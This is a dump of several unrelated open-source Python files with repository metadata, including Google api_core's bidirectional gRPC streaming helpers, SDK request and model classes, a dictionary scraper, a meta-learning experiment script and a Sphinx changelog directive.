% (archive, basedir)) zipfile = ZipFile(archive, mode, compression=ZIP_DEFLATED) for dirpath, _, filenames in os.walk(basedir): for name in filenames: path = os.path.normpath(os.path.join(dirpath, name)) if os.path.isfile(path): zipfile.write(path, path) log("Adding %s" % path) zipfile.close() finally: if rootdir is not None: os.chdir(cwd) def extract_zip(archive, outdir=None): """Extract a zip file. Extracts all the files to the 'outdir' directory (defaults to current dir) """ zipfile = ZipFile(archive, "r") if outdir is None: outdir = os.getcwd() zipfile.extractall(outdir) zipfile.close()
39.567797
120
0.612123
795a8d295f17c93092538799177e206f9211bb32
22,182
py
Python
api_core/google/api_core/bidi.py
erikwebb/google-cloud-python
288a878e9a07239015c78a193eca1cc15e926127
[ "Apache-2.0" ]
3
2019-03-03T14:16:17.000Z
2020-01-22T20:39:11.000Z
api_core/google/api_core/bidi.py
erikwebb/google-cloud-python
288a878e9a07239015c78a193eca1cc15e926127
[ "Apache-2.0" ]
1
2021-04-30T20:46:36.000Z
2021-04-30T20:46:36.000Z
api_core/google/api_core/bidi.py
erikwebb/google-cloud-python
288a878e9a07239015c78a193eca1cc15e926127
[ "Apache-2.0" ]
1
2020-11-15T11:44:36.000Z
2020-11-15T11:44:36.000Z
# Copyright 2017, Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Bi-directional streaming RPC helpers.""" import logging import threading from six.moves import queue from google.api_core import exceptions _LOGGER = logging.getLogger(__name__) _BIDIRECTIONAL_CONSUMER_NAME = "Thread-ConsumeBidirectionalStream" class _RequestQueueGenerator(object): """A helper for sending requests to a gRPC stream from a Queue. This generator takes requests off a given queue and yields them to gRPC. This helper is useful when you have an indeterminate, indefinite, or otherwise open-ended set of requests to send through a request-streaming (or bidirectional) RPC. The reason this is necessary is because gRPC takes an iterator as the request for request-streaming RPCs. gRPC consumes this iterator in another thread to allow it to block while generating requests for the stream. However, if the generator blocks indefinitely gRPC will not be able to clean up the thread as it'll be blocked on `next(iterator)` and not be able to check the channel status to stop iterating. This helper mitigates that by waiting on the queue with a timeout and checking the RPC state before yielding. Finally, it allows for retrying without swapping queues because if it does pull an item off the queue when the RPC is inactive, it'll immediately put it back and then exit. This is necessary because yielding the item in this case will cause gRPC to discard it. 
In practice, this means that the order of messages is not guaranteed. If such a thing is necessary it would be easy to use a priority queue. Example:: requests = request_queue_generator(q) call = stub.StreamingRequest(iter(requests)) requests.call = call for response in call: print(response) q.put(...) Note that it is possible to accomplish this behavior without "spinning" (using a queue timeout). One possible way would be to use more threads to multiplex the grpc end event with the queue, another possible way is to use selectors and a custom event/queue object. Both of these approaches are significant from an engineering perspective for small benefit - the CPU consumed by spinning is pretty minuscule. Args: queue (queue.Queue): The request queue. period (float): The number of seconds to wait for items from the queue before checking if the RPC is cancelled. In practice, this determines the maximum amount of time the request consumption thread will live after the RPC is cancelled. initial_request (Union[protobuf.Message, Callable[None, protobuf.Message]]): The initial request to yield. This is done independently of the request queue to allow fo easily restarting streams that require some initial configuration request. """ def __init__(self, queue, period=1, initial_request=None): self._queue = queue self._period = period self._initial_request = initial_request self.call = None def _is_active(self): # Note: there is a possibility that this starts *before* the call # property is set. So we have to check if self.call is set before # seeing if it's active. 
if self.call is not None and not self.call.is_active(): return False else: return True def __iter__(self): if self._initial_request is not None: if callable(self._initial_request): yield self._initial_request() else: yield self._initial_request while True: try: item = self._queue.get(timeout=self._period) except queue.Empty: if not self._is_active(): _LOGGER.debug( "Empty queue and inactive call, exiting request " "generator." ) return else: # call is still active, keep waiting for queue items. continue # The consumer explicitly sent "None", indicating that the request # should end. if item is None: _LOGGER.debug("Cleanly exiting request generator.") return if not self._is_active(): # We have an item, but the call is closed. We should put the # item back on the queue so that the next call can consume it. self._queue.put(item) _LOGGER.debug( "Inactive call, replacing item on queue and exiting " "request generator." ) return yield item class BidiRpc(object): """A helper for consuming a bi-directional streaming RPC. This maps gRPC's built-in interface which uses a request iterator and a response iterator into a socket-like :func:`send` and :func:`recv`. This is a more useful pattern for long-running or asymmetric streams (streams where there is not a direct correlation between the requests and responses). Example:: initial_request = example_pb2.StreamingRpcRequest( setting='example') rpc = BidiRpc(stub.StreamingRpc, initial_request=initial_request) rpc.open() while rpc.is_active(): print(rpc.recv()) rpc.send(example_pb2.StreamingRpcRequest( data='example')) This does *not* retry the stream on errors. See :class:`ResumableBidiRpc`. Args: start_rpc (grpc.StreamStreamMultiCallable): The gRPC method used to start the RPC. initial_request (Union[protobuf.Message, Callable[None, protobuf.Message]]): The initial request to yield. This is useful if an initial request is needed to start the stream. 
""" def __init__(self, start_rpc, initial_request=None): self._start_rpc = start_rpc self._initial_request = initial_request self._request_queue = queue.Queue() self._request_generator = None self._is_active = False self._callbacks = [] self.call = None def add_done_callback(self, callback): """Adds a callback that will be called when the RPC terminates. This occurs when the RPC errors or is successfully terminated. Args: callback (Callable[[grpc.Future], None]): The callback to execute. It will be provided with the same gRPC future as the underlying stream which will also be a :class:`grpc.Call`. """ self._callbacks.append(callback) def _on_call_done(self, future): for callback in self._callbacks: callback(future) def open(self): """Opens the stream.""" if self.is_active: raise ValueError("Can not open an already open stream.") request_generator = _RequestQueueGenerator( self._request_queue, initial_request=self._initial_request ) call = self._start_rpc(iter(request_generator)) request_generator.call = call # TODO: api_core should expose the future interface for wrapped # callables as well. if hasattr(call, "_wrapped"): # pragma: NO COVER call._wrapped.add_done_callback(self._on_call_done) else: call.add_done_callback(self._on_call_done) self._request_generator = request_generator self.call = call def close(self): """Closes the stream.""" if self.call is None: return self._request_queue.put(None) self.call.cancel() self._request_generator = None # Don't set self.call to None. Keep it around so that send/recv can # raise the error. def send(self, request): """Queue a message to be sent on the stream. Send is non-blocking. If the underlying RPC has been closed, this will raise. Args: request (protobuf.Message): The request to send. """ if self.call is None: raise ValueError("Can not send() on an RPC that has never been open()ed.") # Don't use self.is_active(), as ResumableBidiRpc will overload it # to mean something semantically different. 
if self.call.is_active(): self._request_queue.put(request) else: # calling next should cause the call to raise. next(self.call) def recv(self): """Wait for a message to be returned from the stream. Recv is blocking. If the underlying RPC has been closed, this will raise. Returns: protobuf.Message: The received message. """ if self.call is None: raise ValueError("Can not recv() on an RPC that has never been open()ed.") return next(self.call) @property def is_active(self): """bool: True if this stream is currently open and active.""" return self.call is not None and self.call.is_active() @property def pending_requests(self): """int: Returns an estimate of the number of queued requests.""" return self._request_queue.qsize() class ResumableBidiRpc(BidiRpc): """A :class:`BidiRpc` that can automatically resume the stream on errors. It uses the ``should_recover`` arg to determine if it should re-establish the stream on error. Example:: def should_recover(exc): return ( isinstance(exc, grpc.RpcError) and exc.code() == grpc.StatusCode.UNVAILABLE) initial_request = example_pb2.StreamingRpcRequest( setting='example') rpc = ResumeableBidiRpc( stub.StreamingRpc, initial_request=initial_request, should_recover=should_recover) rpc.open() while rpc.is_active(): print(rpc.recv()) rpc.send(example_pb2.StreamingRpcRequest( data='example')) Args: start_rpc (grpc.StreamStreamMultiCallable): The gRPC method used to start the RPC. initial_request (Union[protobuf.Message, Callable[None, protobuf.Message]]): The initial request to yield. This is useful if an initial request is needed to start the stream. should_recover (Callable[[Exception], bool]): A function that returns True if the stream should be recovered. This will be called whenever an error is encountered on the stream. 
""" def __init__(self, start_rpc, should_recover, initial_request=None): super(ResumableBidiRpc, self).__init__(start_rpc, initial_request) self._should_recover = should_recover self._operational_lock = threading.RLock() self._finalized = False self._finalize_lock = threading.Lock() def _finalize(self, result): with self._finalize_lock: if self._finalized: return for callback in self._callbacks: callback(result) self._finalized = True def _on_call_done(self, future): # Unlike the base class, we only execute the callbacks on a terminal # error, not for errors that we can recover from. Note that grpc's # "future" here is also a grpc.RpcError. with self._operational_lock: if not self._should_recover(future): self._finalize(future) else: _LOGGER.debug("Re-opening stream from gRPC callback.") self._reopen() def _reopen(self): with self._operational_lock: # Another thread already managed to re-open this stream. if self.call is not None and self.call.is_active(): _LOGGER.debug("Stream was already re-established.") return self.call = None # Request generator should exit cleanly since the RPC its bound to # has exited. self.request_generator = None # Note: we do not currently do any sort of backoff here. The # assumption is that re-establishing the stream under normal # circumstances will happen in intervals greater than 60s. # However, it is possible in a degenerative case that the server # closes the stream rapidly which would lead to thrashing here, # but hopefully in those cases the server would return a non- # retryable error. try: self.open() # If re-opening or re-calling the method fails for any reason, # consider it a terminal error and finalize the stream. except Exception as exc: _LOGGER.debug("Failed to re-open stream due to %s", exc) self._finalize(exc) raise _LOGGER.info("Re-established stream") def _recoverable(self, method, *args, **kwargs): """Wraps a method to recover the stream and retry on error. 
If a retryable error occurs while making the call, then the stream will be re-opened and the method will be retried. This happens indefinitely so long as the error is a retryable one. If an error occurs while re-opening the stream, then this method will raise immediately and trigger finalization of this object. Args: method (Callable[..., Any]): The method to call. args: The args to pass to the method. kwargs: The kwargs to pass to the method. """ while True: try: return method(*args, **kwargs) except Exception as exc: with self._operational_lock: _LOGGER.debug("Call to retryable %r caused %s.", method, exc) if not self._should_recover(exc): self.close() _LOGGER.debug("Not retrying %r due to %s.", method, exc) self._finalize(exc) raise exc _LOGGER.debug("Re-opening stream from retryable %r.", method) self._reopen() def _send(self, request): # Grab a reference to the RPC call. Because another thread (notably # the gRPC error thread) can modify self.call (by invoking reopen), # we should ensure our reference can not change underneath us. # If self.call is modified (such as replaced with a new RPC call) then # this will use the "old" RPC, which should result in the same # exception passed into gRPC's error handler being raised here, which # will be handled by the usual error handling in retryable. with self._operational_lock: call = self.call if call is None: raise ValueError("Can not send() on an RPC that has never been open()ed.") # Don't use self.is_active(), as ResumableBidiRpc will overload it # to mean something semantically different. if call.is_active(): self._request_queue.put(request) pass else: # calling next should cause the call to raise. 
next(call) def send(self, request): return self._recoverable(self._send, request) def _recv(self): with self._operational_lock: call = self.call if call is None: raise ValueError("Can not recv() on an RPC that has never been open()ed.") return next(call) def recv(self): return self._recoverable(self._recv) @property def is_active(self): """bool: True if this stream is currently open and active.""" # Use the operational lock. It's entirely possible for something # to check the active state *while* the RPC is being retried. # Also, use finalized to track the actual terminal state here. # This is because if the stream is re-established by the gRPC thread # it's technically possible to check this between when gRPC marks the # RPC as inactive and when gRPC executes our callback that re-opens # the stream. with self._operational_lock: return self.call is not None and not self._finalized class BackgroundConsumer(object): """A bi-directional stream consumer that runs in a separate thread. This maps the consumption of a stream into a callback-based model. It also provides :func:`pause` and :func:`resume` to allow for flow-control. Example:: def should_recover(exc): return ( isinstance(exc, grpc.RpcError) and exc.code() == grpc.StatusCode.UNVAILABLE) initial_request = example_pb2.StreamingRpcRequest( setting='example') rpc = ResumeableBidiRpc( stub.StreamingRpc, initial_request=initial_request, should_recover=should_recover) def on_response(response): print(response) consumer = BackgroundConsumer(rpc, on_response) consumer.start() Note that error handling *must* be done by using the provided ``bidi_rpc``'s ``add_done_callback``. This helper will automatically exit whenever the RPC itself exits and will not provide any error details. Args: bidi_rpc (BidiRpc): The RPC to consume. Should not have been ``open()``ed yet. on_response (Callable[[protobuf.Message], None]): The callback to be called for every response on the stream. 
""" def __init__(self, bidi_rpc, on_response): self._bidi_rpc = bidi_rpc self._on_response = on_response self._paused = False self._wake = threading.Condition() self._thread = None self._operational_lock = threading.Lock() def _on_call_done(self, future): # Resume the thread if it's paused, this prevents blocking forever # when the RPC has terminated. self.resume() def _thread_main(self): try: self._bidi_rpc.add_done_callback(self._on_call_done) self._bidi_rpc.open() while self._bidi_rpc.is_active: # Do not allow the paused status to change at all during this # section. There is a condition where we could be resumed # between checking if we are paused and calling wake.wait(), # which means that we will miss the notification to wake up # (oops!) and wait for a notification that will never come. # Keeping the lock throughout avoids that. # In the future, we could use `Condition.wait_for` if we drop # Python 2.7. with self._wake: if self._paused: _LOGGER.debug("paused, waiting for waking.") self._wake.wait() _LOGGER.debug("woken.") _LOGGER.debug("waiting for recv.") response = self._bidi_rpc.recv() _LOGGER.debug("recved response.") self._on_response(response) except exceptions.GoogleAPICallError as exc: _LOGGER.debug( "%s caught error %s and will exit. 
Generally this is due to " "the RPC itself being cancelled and the error will be " "surfaced to the calling code.", _BIDIRECTIONAL_CONSUMER_NAME, exc, exc_info=True, ) except Exception as exc: _LOGGER.exception( "%s caught unexpected exception %s and will exit.", _BIDIRECTIONAL_CONSUMER_NAME, exc, ) else: _LOGGER.error("The bidirectional RPC exited.") _LOGGER.info("%s exiting", _BIDIRECTIONAL_CONSUMER_NAME) def start(self): """Start the background thread and begin consuming the thread.""" with self._operational_lock: thread = threading.Thread( name=_BIDIRECTIONAL_CONSUMER_NAME, target=self._thread_main ) thread.daemon = True thread.start() self._thread = thread _LOGGER.debug("Started helper thread %s", thread.name) def stop(self): """Stop consuming the stream and shutdown the background thread.""" with self._operational_lock: self._bidi_rpc.close() if self._thread is not None: # Resume the thread to wake it up in case it is sleeping. self.resume() self._thread.join() self._thread = None @property def is_active(self): """bool: True if the background thread is active.""" return self._thread is not None and self._thread.is_alive() def pause(self): """Pauses the response stream. This does *not* pause the request stream. """ with self._wake: self._paused = True def resume(self): """Resumes the response stream.""" with self._wake: self._paused = False self._wake.notifyAll() @property def is_paused(self): """bool: True if the response stream is paused.""" return self._paused
36.908486
86
0.617392
795a8e63478e2a931c91b82db36f0cead58578a9
1,437
py
Python
jdcloud_sdk/services/starshield/apis/ListCertificatePacksRequest.py
jdcloud-apigateway/jdcloud-sdk-python
0886769bcf1fb92128a065ff0f4695be099571cc
[ "Apache-2.0" ]
14
2018-04-19T09:53:56.000Z
2022-01-27T06:05:48.000Z
jdcloud_sdk/services/starshield/apis/ListCertificatePacksRequest.py
jdcloud-apigateway/jdcloud-sdk-python
0886769bcf1fb92128a065ff0f4695be099571cc
[ "Apache-2.0" ]
15
2018-09-11T05:39:54.000Z
2021-07-02T12:38:02.000Z
jdcloud_sdk/services/starshield/apis/ListCertificatePacksRequest.py
jdcloud-apigateway/jdcloud-sdk-python
0886769bcf1fb92128a065ff0f4695be099571cc
[ "Apache-2.0" ]
33
2018-04-20T05:29:16.000Z
2022-02-17T09:10:05.000Z
# coding=utf8 # Copyright 2018 JDCLOUD.COM # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # NOTE: This class is auto generated by the jdcloud code generator program. from jdcloud_sdk.core.jdcloudrequest import JDCloudRequest class ListCertificatePacksRequest(JDCloudRequest): """ 对于给定域,列出所有激活的证书包 """ def __init__(self, parameters, header=None, version="v1"): super(ListCertificatePacksRequest, self).__init__( '/zones/{zone_identifier}/ssl$$certificate_packs', 'GET', header, version) self.parameters = parameters class ListCertificatePacksParameters(object): def __init__(self, zone_identifier, ): """ :param zone_identifier: """ self.zone_identifier = zone_identifier self.status = None def setStatus(self, status): """ :param status: (Optional) 包括所有状态的证书包,而不仅仅是激活状态的证书包。 """ self.status = status
29.326531
86
0.702853
795a8f20b4cd0fcd05adc31bbb77b6c1dfe6b3fc
620
py
Python
larousse_api/larousse.py
quentin-dev/larousse_api
620a907415b0473abd6229c5bb773674781c071e
[ "MIT" ]
3
2020-12-13T21:57:56.000Z
2022-02-03T22:45:15.000Z
larousse_api/larousse.py
elydev01/larousse_api
620a907415b0473abd6229c5bb773674781c071e
[ "MIT" ]
5
2019-10-09T14:40:37.000Z
2020-03-31T08:19:05.000Z
larousse_api/larousse.py
elydev01/larousse_api
620a907415b0473abd6229c5bb773674781c071e
[ "MIT" ]
2
2021-02-28T11:15:32.000Z
2021-11-12T09:37:18.000Z
import requests import re import unicodedata from bs4 import BeautifulSoup def get_definitions(word): """ :param word: The word whose definition you are looking for :return: A list containing all the definitions of word """ url = "https://www.larousse.fr/dictionnaires/francais/" + word.lower() soup = BeautifulSoup(requests.get(url=url).text, 'html.parser') for ul in soup.find_all('ul'): if ul.get('class') is not None and 'Definitions' in ul.get('class'): return [unicodedata.normalize("NFKD", re.sub("<.*?>", "", str(li))) for li in ul.find_all('li')] return []
34.444444
108
0.66129
795a8f734257d6a65fc1f5d2097134b51d0d5e20
898
py
Python
openbts-python/setup.py
cclauss/CommunityCellularManager
4a4e951b03380dcf5f16091d33bc52afbb3eca21
[ "BSD-3-Clause" ]
84
2016-11-03T20:51:09.000Z
2018-09-13T04:36:18.000Z
openbts-python/setup.py
cclauss/CommunityCellularManager
4a4e951b03380dcf5f16091d33bc52afbb3eca21
[ "BSD-3-Clause" ]
79
2016-11-10T06:30:58.000Z
2018-06-01T14:29:39.000Z
openbts-python/setup.py
vbohinc/CommunityCellularManager
ab330fcb1bc70ee3a8e9bcdac2846ab6c327f87c
[ "BSD-3-Clause" ]
37
2016-11-03T22:53:22.000Z
2018-09-07T15:32:16.000Z
""" Copyright (c) 2016-present, Facebook, Inc. All rights reserved. This source code is licensed under the BSD-style license found in the LICENSE file in the root directory of this source tree. An additional grant of patent rights can be found in the PATENTS file in the same directory. """ """The openbts-python package.""" from setuptools import setup with open('readme.md') as f: README = f.read() VERSION = '0.1.15' setup( name='openbts', version=VERSION, description='OpenBTS NodeManager client', long_description=README, url='http://github.com/endaga/openbts-python', download_url=('https://github.com/endaga/openbts-python/tarball/%s' % VERSION), author='Shaddi Hasan', author_email='shasan@fb.com', license='BSD', packages=['openbts'], install_requires=[ "enum34==1.0.4", "envoy==0.0.3", "pyzmq==14.5.0", ], zip_safe=False )
21.902439
75
0.687082
795a8fad2a55fc2516589db8e81dd3ee9ea8ec4d
5,594
py
Python
intersight/models/task_ucs_task5_ref.py
sdnit-se/intersight-python
551f7685c0f76bb8af60ec83ffb6f9672d49a4ae
[ "Apache-2.0" ]
21
2018-03-29T14:20:35.000Z
2021-10-13T05:11:41.000Z
intersight/models/task_ucs_task5_ref.py
sdnit-se/intersight-python
551f7685c0f76bb8af60ec83ffb6f9672d49a4ae
[ "Apache-2.0" ]
14
2018-01-30T15:45:46.000Z
2022-02-23T14:23:21.000Z
intersight/models/task_ucs_task5_ref.py
sdnit-se/intersight-python
551f7685c0f76bb8af60ec83ffb6f9672d49a4ae
[ "Apache-2.0" ]
18
2018-01-03T15:09:56.000Z
2021-07-16T02:21:54.000Z
# coding: utf-8 """ Intersight REST API This is Intersight REST API OpenAPI spec version: 1.0.9-961 Generated by: https://github.com/swagger-api/swagger-codegen.git """ from pprint import pformat from six import iteritems import re class TaskUcsTask5Ref(object): """ NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'moid': 'str', 'object_type': 'str', 'selector': 'str' } attribute_map = { 'moid': 'Moid', 'object_type': 'ObjectType', 'selector': 'Selector' } def __init__(self, moid=None, object_type=None, selector=None): """ TaskUcsTask5Ref - a model defined in Swagger """ self._moid = None self._object_type = None self._selector = None if moid is not None: self.moid = moid if object_type is not None: self.object_type = object_type if selector is not None: self.selector = selector @property def moid(self): """ Gets the moid of this TaskUcsTask5Ref. The Moid of the referenced REST resource. :return: The moid of this TaskUcsTask5Ref. :rtype: str """ return self._moid @moid.setter def moid(self, moid): """ Sets the moid of this TaskUcsTask5Ref. The Moid of the referenced REST resource. :param moid: The moid of this TaskUcsTask5Ref. :type: str """ self._moid = moid @property def object_type(self): """ Gets the object_type of this TaskUcsTask5Ref. The Object Type of the referenced REST resource. :return: The object_type of this TaskUcsTask5Ref. :rtype: str """ return self._object_type @object_type.setter def object_type(self, object_type): """ Sets the object_type of this TaskUcsTask5Ref. The Object Type of the referenced REST resource. :param object_type: The object_type of this TaskUcsTask5Ref. 
:type: str """ self._object_type = object_type @property def selector(self): """ Gets the selector of this TaskUcsTask5Ref. An OData $filter expression which describes the REST resource to be referenced. This field may be set instead of 'moid' by clients. If 'moid' is set this field is ignored. If 'selector' is set and 'moid' is empty/absent from the request, Intersight will determine the Moid of the resource matching the filter expression and populate it in the MoRef that is part of the object instance being inserted/updated to fulfill the REST request. An error is returned if the filter matches zero or more than one REST resource. An example filter string is: Serial eq '3AA8B7T11'. :return: The selector of this TaskUcsTask5Ref. :rtype: str """ return self._selector @selector.setter def selector(self, selector): """ Sets the selector of this TaskUcsTask5Ref. An OData $filter expression which describes the REST resource to be referenced. This field may be set instead of 'moid' by clients. If 'moid' is set this field is ignored. If 'selector' is set and 'moid' is empty/absent from the request, Intersight will determine the Moid of the resource matching the filter expression and populate it in the MoRef that is part of the object instance being inserted/updated to fulfill the REST request. An error is returned if the filter matches zero or more than one REST resource. An example filter string is: Serial eq '3AA8B7T11'. :param selector: The selector of this TaskUcsTask5Ref. 
:type: str """ self._selector = selector def to_dict(self): """ Returns the model properties as a dict """ result = {} for attr, _ in iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """ Returns the string representation of the model """ return pformat(self.to_dict()) def __repr__(self): """ For `print` and `pprint` """ return self.to_str() def __eq__(self, other): """ Returns true if both objects are equal """ if not isinstance(other, TaskUcsTask5Ref): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """ Returns true if both objects are not equal """ return not self == other
30.736264
580
0.595459
795a9001970a5ea4321f9a07be5d5977684a56e8
3,136
py
Python
maml_examples/cluster_maml_trpo_cheetah.py
chi6/Model-based-meta-learning-rl
fda134dcbd87ef3e91f339ea2f836f28ec5f7784
[ "MIT" ]
2
2019-09-10T10:13:20.000Z
2020-07-17T01:37:27.000Z
maml_examples/cluster_maml_trpo_cheetah.py
chi6/Model-based-meta-learning-rl
fda134dcbd87ef3e91f339ea2f836f28ec5f7784
[ "MIT" ]
null
null
null
maml_examples/cluster_maml_trpo_cheetah.py
chi6/Model-based-meta-learning-rl
fda134dcbd87ef3e91f339ea2f836f28ec5f7784
[ "MIT" ]
null
null
null
from sandbox.rocky.tf.algos.maml_trpo import MAMLTRPO from rllab.baselines.linear_feature_baseline import LinearFeatureBaseline from rllab.baselines.gaussian_mlp_baseline import GaussianMLPBaseline from rllab.envs.mujoco.half_cheetah_env_rand import HalfCheetahEnvRand from rllab.envs.mujoco.half_cheetah_env_rand_direc import HalfCheetahEnvRandDirec from rllab.envs.normalized_env import normalize from rllab.misc.instrument import stub, run_experiment_lite #from rllab.policies.gaussian_mlp_policy import GaussianMLPPolicy from sandbox.rocky.tf.policies.maml_minimal_gauss_mlp_policy import MAMLGaussianMLPPolicy from sandbox.rocky.tf.envs.base import TfEnv import tensorflow as tf stub(globals()) from rllab.misc.instrument import VariantGenerator, variant class VG(VariantGenerator): @variant def fast_lr(self): return [0.1] @variant def meta_step_size(self): return [0.01] @variant def fast_batch_size(self): return [20] # #10, 20, 40 @variant def meta_batch_size(self): return [40] # at least a total batch size of 400. (meta batch size*fast batch size) @variant def seed(self): return [1] @variant def direc(self): # directionenv vs. 
goal velocity return [False] # should also code up alternative KL thing variants = VG().variants() max_path_length = 200 num_grad_updates = 1 use_maml=True for v in variants: direc = v['direc'] learning_rate = v['meta_step_size'] if direc: env = TfEnv(normalize(HalfCheetahEnvRandDirec())) else: env = TfEnv(normalize(HalfCheetahEnvRand())) policy = MAMLGaussianMLPPolicy( name="policy", env_spec=env.spec, grad_step_size=v['fast_lr'], hidden_nonlinearity=tf.nn.relu, hidden_sizes=(100,100), ) baseline = LinearFeatureBaseline(env_spec=env.spec) algo = MAMLTRPO( env=env, policy=policy, baseline=baseline, batch_size=v['fast_batch_size'], # number of trajs for grad update max_path_length=max_path_length, meta_batch_size=v['meta_batch_size'], num_grad_updates=num_grad_updates, n_itr=800, use_maml=use_maml, step_size=v['meta_step_size'], plot=False, ) direc = 'direc' if direc else '' run_experiment_lite( algo.train(), exp_prefix='trpo_maml_cheetah' + direc + str(max_path_length), exp_name='maml'+str(int(use_maml))+'_fbs'+str(v['fast_batch_size'])+'_mbs'+str(v['meta_batch_size'])+'_flr_' + str(v['fast_lr']) + '_mlr' + str(v['meta_step_size']), # Number of parallel workers for sampling n_parallel=8, # Only keep the snapshot parameters for the last iteration snapshot_mode="gap", snapshot_gap=25, sync_s3_pkl=True, python_command='python3', # Specifies the seed for the experiment. If this is not provided, a random seed # will be used seed=v["seed"], mode="local", #mode="ec2", variant=v, # plot=True, # terminate_machine=False, )
29.037037
174
0.678253
795a908ea18e039c94c742cc3feee5df15c3ceca
2,949
py
Python
chemicaltoolbox/mordred/mordred_descriptors.py
pavanvidem/galaxytools
339363f6c9d817bc2c35997b4dfdd3ca99a37055
[ "MIT" ]
null
null
null
chemicaltoolbox/mordred/mordred_descriptors.py
pavanvidem/galaxytools
339363f6c9d817bc2c35997b4dfdd3ca99a37055
[ "MIT" ]
null
null
null
chemicaltoolbox/mordred/mordred_descriptors.py
pavanvidem/galaxytools
339363f6c9d817bc2c35997b4dfdd3ca99a37055
[ "MIT" ]
null
null
null
import argparse import numpy as np from mordred import Calculator, descriptors from rdkit import Chem from rdkit.Chem.rdmolfiles import SDMolSupplier def convert_errors_to_nan(el): """ Remove elements from the Mordred dataframe which are not in float or int format """ if type(el) == bool: return int(el) if type(el) not in [float, int, np.float64]: return None return el def mol_supplier(filename, ext): """ Based on the file extension, use the appropriate RDKit function to load a chemical data file (SMILES or SDF) containing multiple molecules and return a list of RDKit Mol objects """ if ext == "sdf": return [n for n in SDMolSupplier(filename)] with open(filename) as f: mols = f.read().split("\n") if ext == "smi": return [Chem.MolFromSmiles(mol, sanitize=True) for mol in mols if mol != ""] if ext == "inchi": return [ Chem.inchi.MolFromInchi(mol, sanitize=True) for mol in mols if mol != "" ] def mordred_descriptors(mols, output, header, use_3d, smi_as_col): """ Calculate Mordred descriptors and save as tabular """ calc = Calculator(descriptors, ignore_3D=(not use_3d)) invalid_mols = np.where(np.array(mols) is None)[ 0 ] # indices of invalid SMILES/SDMols mols = [ Chem.MolFromSmiles("") if n is None else n for n in mols ] # replace invalid mols with placeholder df = calc.pandas(mols, quiet=True) # calculate descriptors for mol in invalid_mols: # remove placeholders df.iloc[mol] = np.nan df = df.applymap(convert_errors_to_nan) # remove descriptors which errored df = df.round(6) if smi_as_col: smiles = [Chem.MolToSmiles(mol) for mol in mols] df["SMILES"] = smiles df.to_csv(output, na_rep="", sep="\t", index=False, header=header) # write output if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("-i", "--infile", required=True, help="Path to the input file.") parser.add_argument("--iformat", help="Specify the input file format.") parser.add_argument( "-o", "--outfile", type=argparse.FileType("w+"), help="Path to the result file" ) 
parser.add_argument( "--3d", dest="use_3d", action="store_true", default=False, help="Use 3d descriptors - only with SDF input.", ) parser.add_argument( "--header", dest="header", action="store_true", default=False, help="Write header line.", ) parser.add_argument( "--smiles", dest="smiles", action="store_true", default=False, help="Add a column with compound SMILES.", ) args = parser.parse_args() mols = mol_supplier(args.infile, args.iformat) mordred_descriptors(mols, args.outfile, args.header, args.use_3d, args.smiles)
30.091837
88
0.630722
795a91537634b5ee6ffe59a10855e1afd271e9e9
1,543
py
Python
sunpy/util/sphinx/changelog.py
tacaswell/sunpy
1e06d75408d1a621749a5d4e743ae44a31886100
[ "BSD-2-Clause" ]
null
null
null
sunpy/util/sphinx/changelog.py
tacaswell/sunpy
1e06d75408d1a621749a5d4e743ae44a31886100
[ "BSD-2-Clause" ]
null
null
null
sunpy/util/sphinx/changelog.py
tacaswell/sunpy
1e06d75408d1a621749a5d4e743ae44a31886100
[ "BSD-2-Clause" ]
null
null
null
import tempfile from docutils import statemachine from docutils.parsers.rst import Directive from sunpy.util.towncrier import generate_changelog_for_docs __all__ = ['ChangeLog'] class ChangeLog(Directive): """ Render the changelog for the current commit using towncrier. This directive renders all the towncrier newsfiles into your current documentation, this can be used to keep a rendered version of the changelog since your last release in your documentation. The directive takes one argument which is the location of your ``pyproject.toml`` file (towncrier configuration) relative to the ``conf.py`` file *not* the file in which the directive is located. If this argument is not specified it defaults to `"../"`. Examples -------- .. code-block:: rst .. changelog:: """ required_arguments = 0 optional_arguments = 1 final_argument_whitespace = True def run(self): config_path = self.arguments[0] or "../" output_file = tempfile.mkstemp()[1] generate_changelog_for_docs(config_path, output_filename=output_file) with open(output_file) as fobj: include_lines = statemachine.string2lines(fobj.read(), convert_whitespace=True) self.state_machine.insert_input(include_lines, "") return [] class DummyChangelog(ChangeLog): def run(self): return [] def setup(app): app.add_directive('changelog', ChangeLog) return {'parallel_read_safe': True, 'parallel_write_safe': True}
27.553571
91
0.701231
795a922c6c3a6a5d1c9b0a8249fec81256ffb0ab
14,276
py
Python
src/flask/sessions.py
wnz27/flask
950801e4d37e44f35cf6d76c9b261d1b4ea6f356
[ "BSD-3-Clause" ]
1
2019-05-31T14:00:53.000Z
2019-05-31T14:00:53.000Z
src/flask/sessions.py
thnee/flask
c791f6312b092678c2a152d0605e49c26831cb05
[ "BSD-3-Clause" ]
null
null
null
src/flask/sessions.py
thnee/flask
c791f6312b092678c2a152d0605e49c26831cb05
[ "BSD-3-Clause" ]
null
null
null
